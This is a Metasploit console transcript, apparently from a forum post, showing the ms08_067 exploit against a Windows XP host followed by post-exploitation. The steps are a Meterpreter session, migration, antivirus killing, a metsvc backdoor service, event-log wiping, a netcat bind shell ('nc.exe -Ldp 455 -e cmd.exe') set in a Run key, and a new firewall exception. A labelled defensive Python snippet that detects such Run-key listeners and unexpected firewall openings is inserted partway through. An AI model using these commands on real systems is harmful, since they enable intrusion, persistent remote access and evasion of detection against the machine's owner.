       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 815 exploits - 459 auxiliary - 137 post
+ -- --=[ 248 payloads - 27 encoders - 8 nops
       =[ svn r14995 updated -3719 days ago (2012.03.20)

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:1481 -> 192.168.1.101:4444) at 2002-01-13 16:05:53 -0200

meterpreter >
meterpreter > help

Core Commands
=============

    Command                    Description
    -------                    -----------
    ?                          Help menu
    background                 Backgrounds the current session
    bgkill                     Kills a background meterpreter script
    bglist                     Lists running background scripts
    bgrun                      Executes a meterpreter script as a background thread
    channel                    Displays information about active channels
    close                      Closes a channel
    detach                     Detach the meterpreter session (for http/https)
    disable_unicode_encoding   Disables encoding of unicode strings
    enable_unicode_encoding    Enables encoding of unicode strings
    exit                       Terminate the meterpreter session
    help                       Help menu
    info                       Displays information about a Post module
    interact                   Interacts with a channel
    irb                        Drop into irb scripting mode
    load                       Load one or more meterpreter extensions
    migrate                    Migrate the server to another process
    quit                       Terminate the meterpreter session
    read                       Reads data from a channel
    resource                   Run the commands stored in a file
    run                        Executes a meterpreter script or Post module
    use                        Deprecated alias for 'load'
    write                      Writes data to a channel

Stdapi: File system Commands
============================

    Command                    Description
    -------                    -----------
    cat                        Read the contents of a file to the screen
    cd                         Change directory
    del                        Delete the specified file
    download                   Download a file or directory
    edit                       Edit a file
    getlwd                     Print local working directory
    getwd                      Print working directory
    lcd                        Change local working directory
    lpwd                       Print local working directory
    ls                         List files
    mkdir                      Make directory
    pwd                        Print working directory
    rm                         Delete the specified file
    rmdir                      Remove directory
    search                     Search for files
    upload                     Upload a file or directory

Stdapi: Networking Commands
===========================

    Command                    Description
    -------                    -----------
    ifconfig                   Display interfaces
    ipconfig                   Display interfaces
    portfwd                    Forward a local port to a remote service
    route                      View and modify the routing table

Stdapi: System Commands
=======================

    Command                    Description
    -------                    -----------
    clearev                    Clear the event log
    drop_token                 Relinquishes any active impersonation token.
    execute                    Execute a command
    getpid                     Get the current process identifier
    getprivs                   Attempt to enable all privileges available to the current process
    getuid                     Get the user that the server is running as
    kill                       Terminate a process
    ps                         List running processes
    reboot                     Reboots the remote computer
    reg                        Modify and interact with the remote registry
    rev2self                   Calls RevertToSelf() on the remote machine
    shell                      Drop into a system command shell
    shutdown                   Shuts down the remote computer
    steal_token                Attempts to steal an impersonation token from the target process
    sysinfo                    Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command                    Description
    -------                    -----------
    enumdesktops               List all accessible desktops and window stations
    getdesktop                 Get the current meterpreter desktop
    idletime                   Returns the number of seconds the remote user has been idle
    keyscan_dump               Dump the keystroke buffer
    keyscan_start              Start capturing keystrokes
    keyscan_stop               Stop capturing keystrokes
    screenshot                 Grab a screenshot of the interactive desktop
    setdesktop                 Change the meterpreters current desktop
    uictl                      Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command                    Description
    -------                    -----------
    record_mic                 Record audio from the default microphone for X seconds
    webcam_list                List webcams
    webcam_snap                Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

    Command                    Description
    -------                    -----------
    getsystem                  Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command                    Description
    -------                    -----------
    hashdump                   Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command                    Description
    -------                    -----------
    timestomp                  Manipulate file MACE attributes

meterpreter >
meterpreter > getpid
Current pid: 1036
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                            Path
 ---   ----               ----  -------  ----                            ----
 0     [System Process]
 4     System             x86   0        NT AUTHORITY\SYSTEM
 252   wpabaln.exe        x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\wpabaln.exe
 324   rundll32.exe       x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\rundll32.exe
 360   smss.exe           x86   0        NT AUTHORITY\SYSTEM             \SystemRoot\System32\smss.exe
 524   csrss.exe          x86   0        NT AUTHORITY\SYSTEM             \??\C:\WINDOWS\system32\csrss.exe
 556   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM             \??\C:\WINDOWS\system32\winlogon.exe
 668   services.exe       x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\services.exe
 680   lsass.exe          x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\lsass.exe
 844   svchost.exe        x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\svchost.exe
 944   svchost.exe        x86   0        NT AUTHORITY\Servicio de red    C:\WINDOWS\system32\svchost.exe
 1036  svchost.exe        x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\System32\svchost.exe
 1080  explorer.exe       x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\Explorer.EXE
 1216  alg.exe            x86   0        NT AUTHORITY\SERVICIO LOCAL     C:\WINDOWS\System32\alg.exe
 1220  svchost.exe        x86   0        NT AUTHORITY\Servicio de red    C:\WINDOWS\system32\svchost.exe
 1292  svchost.exe        x86   0        NT AUTHORITY\SERVICIO LOCAL     C:\WINDOWS\system32\svchost.exe
 1400  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\spoolsv.exe
 1512  ctfmon.exe         x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\ctfmon.exe
 1944  metsvc.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe

meterpreter > migrate 1080
[*] Migrating to 1080...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 1080
meterpreter >
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Configuración del perfil Dominio:
[*] -------------------------------------------------------------------
[*] Modo funcional = Habilitar
[*] Modo de excepción = Habilitar
[*]
[*] Configuración del perfil Estándar (actual):
[*] -------------------------------------------------------------------
[*] Modo funcional = Deshabilitar
[*] Modo de excepción = Habilitar
[*]
[*] Configuración del servidor de seguridad Conexión de área local:
[*] -------------------------------------------------------------------
[*] Modo funcional = Habilitar
[*]
[*] Checking DEP Support Policy...
meterpreter >
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\RuaehbuTVStIsh...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
Cannot create service (0x00000431)
meterpreter >
meterpreter > reboot
Rebooting...
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.101
RHOST => 192.168.1.101
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 2 opened (192.168.1.100:1576 -> 192.168.1.101:31337) at 2002-01-13 16:30:32 -0200

meterpreter >
meterpreter > getpid
Current pid: 1864
meterpreter > ps

Process list
============

 PID   Name                Arch  Session  User                            Path
 ---   ----                ----  -------  ----                            ----
 0     [System Process]
 4     System              x86   0        NT AUTHORITY\SYSTEM
 356   smss.exe            x86   0        NT AUTHORITY\SYSTEM             \SystemRoot\System32\smss.exe
 476   explorer.exe        x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\Explorer.EXE
 512   csrss.exe           x86   0        NT AUTHORITY\SYSTEM             \??\C:\WINDOWS\system32\csrss.exe
 552   winlogon.exe        x86   0        NT AUTHORITY\SYSTEM             \??\C:\WINDOWS\system32\winlogon.exe
 664   services.exe        x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\services.exe
 676   lsass.exe           x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\lsass.exe
 840   svchost.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\svchost.exe
 948   svchost.exe         x86   0        NT AUTHORITY\Servicio de red    C:\WINDOWS\system32\svchost.exe
 1024  alg.exe             x86   0        NT AUTHORITY\SERVICIO LOCAL     C:\WINDOWS\System32\alg.exe
 1044  svchost.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\System32\svchost.exe
 1124  svchost.exe         x86   0        NT AUTHORITY\Servicio de red    C:\WINDOWS\system32\svchost.exe
 1180  ctfmon.exe          x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\ctfmon.exe
 1288  svchost.exe         x86   0        NT AUTHORITY\SERVICIO LOCAL     C:\WINDOWS\system32\svchost.exe
 1420  spoolsv.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\spoolsv.exe
 1724  wuauclt.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\wuauclt.exe
 1864  metsvc-server.exe   x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc-server.exe
 1964  metsvc.exe          x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe
 2032  wpabaln.exe         x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\wpabaln.exe

meterpreter >
meterpreter > clearev
[*] Wiping 86 records from Application...
[*] Wiping 144 records from System...
[*] Wiping 0 records from Security...
meterpreter >
meterpreter > shell
Process 452 created.
Channel 1 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrador>exit
meterpreter >
meterpreter > sysinfo
Computer        : HACKXCRA-7848AA
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_ES
Meterpreter     : x86/win32
meterpreter >
This is very good, although I'd like to see an intrusion into something other than Windows XP... into 7
meterpreter > upload C:\\nc.exe C:\\windows\\system32
[*] uploading  : C:\nc.exe -> C:\windows\system32
[*] uploaded   : C:\nc.exe -> C:\windows\system32\nc.exe
meterpreter >
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (1):

    nc

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe
meterpreter > execute -f cmd -i
Process 1600 created.
Channel 2 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode
netsh firewall show opmode

Configuración del perfil Dominio:
-------------------------------------------------------------------
Modo funcional                    = Habilitar
Modo de excepción                 = Habilitar

Configuración del perfil Estándar (actual):
-------------------------------------------------------------------
Modo funcional                    = Deshabilitar
Modo de excepción                 = Habilitar

Configuración del servidor de seguridad Conexión de área local:
-------------------------------------------------------------------
Modo funcional                    = Habilitar
C:\WINDOWS\system32>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Ok.
C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode    Name
-------------------------------------------------------------------
139    TCP       Enable  NetBIOS Session Service
445    TCP       Enable  SMB over TCP
137    UDP       Enable  NetBIOS Name Service
138    UDP       Enable  NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode    Name
-------------------------------------------------------------------
455    TCP       Enable  Service Firewall
139    TCP       Enable  NetBIOS Session Service
445    TCP       Enable  SMB over TCP
137    UDP       Enable  NetBIOS Name Service
138    UDP       Enable  NetBIOS Datagram Service

C:\WINDOWS\system32>
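As an added defensive example (not part of the original post), a Python check that flags the two host artifacts the Run-key and netsh steps above leave behind: a Run value whose command line is a listener that spawns a program, and a firewall exception absent from a baseline of expected openings. The sample Run values, the netsh output and the baseline set are constructed here to mirror the transcript.

```python
import re

# Constructed sample Run values, modelled on the 'reg queryval' output above.
RUN_VALUES = {
    "nc": r"C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe",
    "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe",
}

# Constructed sample modelled on 'netsh firewall show portopening' output.
NETSH_OUTPUT = """Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
455 TCP Enable Service Firewall
139 TCP Enable NetBIOS Session Service
445 TCP Enable SMB over TCP
137 UDP Enable NetBIOS Name Service
138 UDP Enable NetBIOS Datagram Service
"""

# Assumed baseline: the File and Printer Sharing openings present before
# the extra exception was added.
BASELINE = {(139, "TCP"), (445, "TCP"), (137, "UDP"), (138, "UDP")}

# A flag cluster containing a listen option (e.g. -l, -L, -Ldp) and an
# -e/-c option naming a program to run when a client connects.
LISTEN_FLAG = re.compile(r"(?<!\S)-[A-Za-z]*[lL][A-Za-z]*(?!\S)")
EXEC_FLAG = re.compile(r"(?<!\S)-[ec]\s+\S+")

def suspicious_run_values(values):
    """Return {name: command} for Run values that both listen and spawn a program."""
    return {
        name: cmd
        for name, cmd in values.items()
        if LISTEN_FLAG.search(cmd) and EXEC_FLAG.search(cmd)
    }

def parse_portopening(text):
    """Parse (port, protocol, name) rows out of 'netsh firewall show portopening'."""
    rows = []
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)\s+(TCP|UDP)\s+\w+\s+(.+?)\s*$", line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3)))
    return rows

def unexpected_openings(text, baseline=BASELINE):
    """Return parsed openings whose (port, protocol) pair is not in the baseline."""
    return [row for row in parse_portopening(text) if (row[0], row[1]) not in baseline]
```

On a live host the same functions take the real Run-key export and the real netsh output; the header and separator lines are skipped by the parser.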
nc -v 192.168.1.101 455
meterpreter > ps

Process list
============

 PID   Name                Arch  Session  User                            Path
 ---   ----                ----  -------  ----                            ----
 0     [System Process]
 4     System              x86   0        NT AUTHORITY\SYSTEM
 256   explorer.exe        x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\Explorer.EXE
 360   smss.exe            x86   0        NT AUTHORITY\SYSTEM             \SystemRoot\System32\smss.exe
 516   csrss.exe           x86   0        NT AUTHORITY\SYSTEM             \??\C:\WINDOWS\system32\csrss.exe
 548   winlogon.exe        x86   0        NT AUTHORITY\SYSTEM             \??\C:\WINDOWS\system32\winlogon.exe
 620   alg.exe             x86   0        NT AUTHORITY\SERVICIO LOCAL     C:\WINDOWS\System32\alg.exe
 660   services.exe        x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\services.exe
 672   lsass.exe           x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\lsass.exe
 800   nc.exe              x86   0        HACKXCRA-7848AA\Administrador   C:\windows\system32\nc.exe
 844   svchost.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\svchost.exe
 864   ctfmon.exe          x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\ctfmon.exe
 928   svchost.exe         x86   0        NT AUTHORITY\Servicio de red    C:\WINDOWS\system32\svchost.exe
 1040  svchost.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\System32\svchost.exe
 1236  svchost.exe         x86   0        NT AUTHORITY\Servicio de red    C:\WINDOWS\system32\svchost.exe
 1288  svchost.exe         x86   0        NT AUTHORITY\SERVICIO LOCAL     C:\WINDOWS\system32\svchost.exe
 1416  spoolsv.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\spoolsv.exe
 1712  wuauclt.exe         x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\system32\wuauclt.exe
 1784  cmd.exe             x86   0        HACKXCRA-7848AA\Administrador   C:\windows\system32\cmd.exe
 1848  metsvc.exe          x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc.exe
 1920  metsvc-server.exe   x86   0        NT AUTHORITY\SYSTEM             C:\WINDOWS\TEMP\VufEQSyNjJ\metsvc-server.exe
 1940  wpabaln.exe         x86   0        HACKXCRA-7848AA\Administrador   C:\WINDOWS\system32\wpabaln.exe

meterpreter >